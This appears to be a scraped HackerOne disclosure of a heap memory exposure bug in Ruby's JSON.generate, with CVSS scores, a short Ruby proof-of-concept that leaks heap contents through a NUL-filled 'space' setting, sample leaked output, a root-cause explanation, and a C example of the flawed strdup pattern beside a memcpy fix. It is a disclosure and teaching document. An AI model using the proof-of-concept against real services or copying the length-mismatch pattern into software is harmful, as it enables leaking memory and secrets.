hackerone / ahmadsherif / H1:209949
Mar 01, 2017 - 10:55 p.m.

Ruby: Arbitrary heap exposure in JSON.generate

2017-03-01 22:55:39
ahmadsherif
hackerone.com
23

9.8 High (CVSS3)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High (CVSS2)
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.008 Low (Percentile 79.3%)

Running this snippet can expose arbitrary memory:

require 'json'

state = JSON.state.new
state.space = "\0" * 1024   # 1024 NUL bytes; the generator records space_len = 1024

puts JSON.generate({a: :b}, state)
{"a":
psych/handlers/recorder.rb
tensi0
reeze)
Gem::Specification.new do |s|
  # to objects of the same type as the original delegate.
mydata/scm/git/ruby/dist/lib/ruby/2.5.0/json/ext.rb
pass the namP
See http://guides.rubygems.org/specification-reference/ for help
#     # constant and class member data initialization...
"b"}

The issue lies in the use of strdup in generator.c: strdup stops at the first NUL byte and returns a pointer to a zero-length string, which does not match the length stored in space_len. fbuffer_append then copies space_len bytes (the 1024 above) from that string into the generated buffer, reading beyond it.

Simpler snippets like JSON.generate({foo: "bar"}, space: "\0" * 1024) suffer the same issue for a slightly different reason: fstrndup uses memccpy, which again stops copying after encountering a NUL byte and returns a pointer to what is effectively a zero-length string.
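As an added example in C (not the reporter's or the json gem's code) of the length mismatch described above: the strdup pattern beside a memcpy copy that honours the explicit length, with the names lenstr, dup_with_strdup and dup_with_memcpy assumed for illustration.

```c
#define _POSIX_C_SOURCE 200809L  /* declares strdup() under strict -std= */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Added example, not the json gem's code: a "space" setting modelled as
 * bytes plus an explicit length, like State#space / space_len in generator.c. */
typedef struct { char *ptr; size_t len; } lenstr;

/* Vulnerable pattern: strdup() stops at the first NUL, so the allocation is
 * strlen(src)+1 bytes while len keeps the full Ruby string length. */
static lenstr dup_with_strdup(const char *src, size_t len) {
    lenstr s = { strdup(src), len };
    return s;
}

/* Hardened form: allocate len bytes and memcpy exactly len bytes, so embedded
 * NULs survive and the stored length matches what was actually copied. */
static lenstr dup_with_memcpy(const char *src, size_t len) {
    lenstr s = { malloc(len ? len : 1), len };
    if (s.ptr) memcpy(s.ptr, src, len); else s.len = 0;
    return s;
}

#define SPACE_LEN 16
static const char SPACE[SPACE_LEN] = {0}; /* constructed: "\0" * 1024, scaled */

/* Bytes the strdup copy dropped; non-zero means a later copy of s.len bytes
 * from s.ptr reads past the allocation into neighbouring heap memory. */
size_t strdup_bytes_missing(void) {
    lenstr s = dup_with_strdup(SPACE, SPACE_LEN);
    size_t missing = s.ptr ? s.len - strlen(s.ptr) : 0;
    free(s.ptr);
    return missing;
}

/* 1 when the memcpy copy preserved every byte, NULs included. */
int memcpy_copy_intact(void) {
    lenstr s = dup_with_memcpy(SPACE, SPACE_LEN);
    int ok = s.ptr && s.len == SPACE_LEN && !memcmp(s.ptr, SPACE, SPACE_LEN);
    free(s.ptr);
    return ok;
}

int main(void) {
    printf("strdup copy dropped %zu of %d bytes; memcpy copy intact: %d\n",
           strdup_bytes_missing(), SPACE_LEN, memcpy_copy_intact());
    return 0;
}
```

The same mismatch applies to the memccpy variant: any copy routine that stops at a NUL must not be paired with a separately stored byte length.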
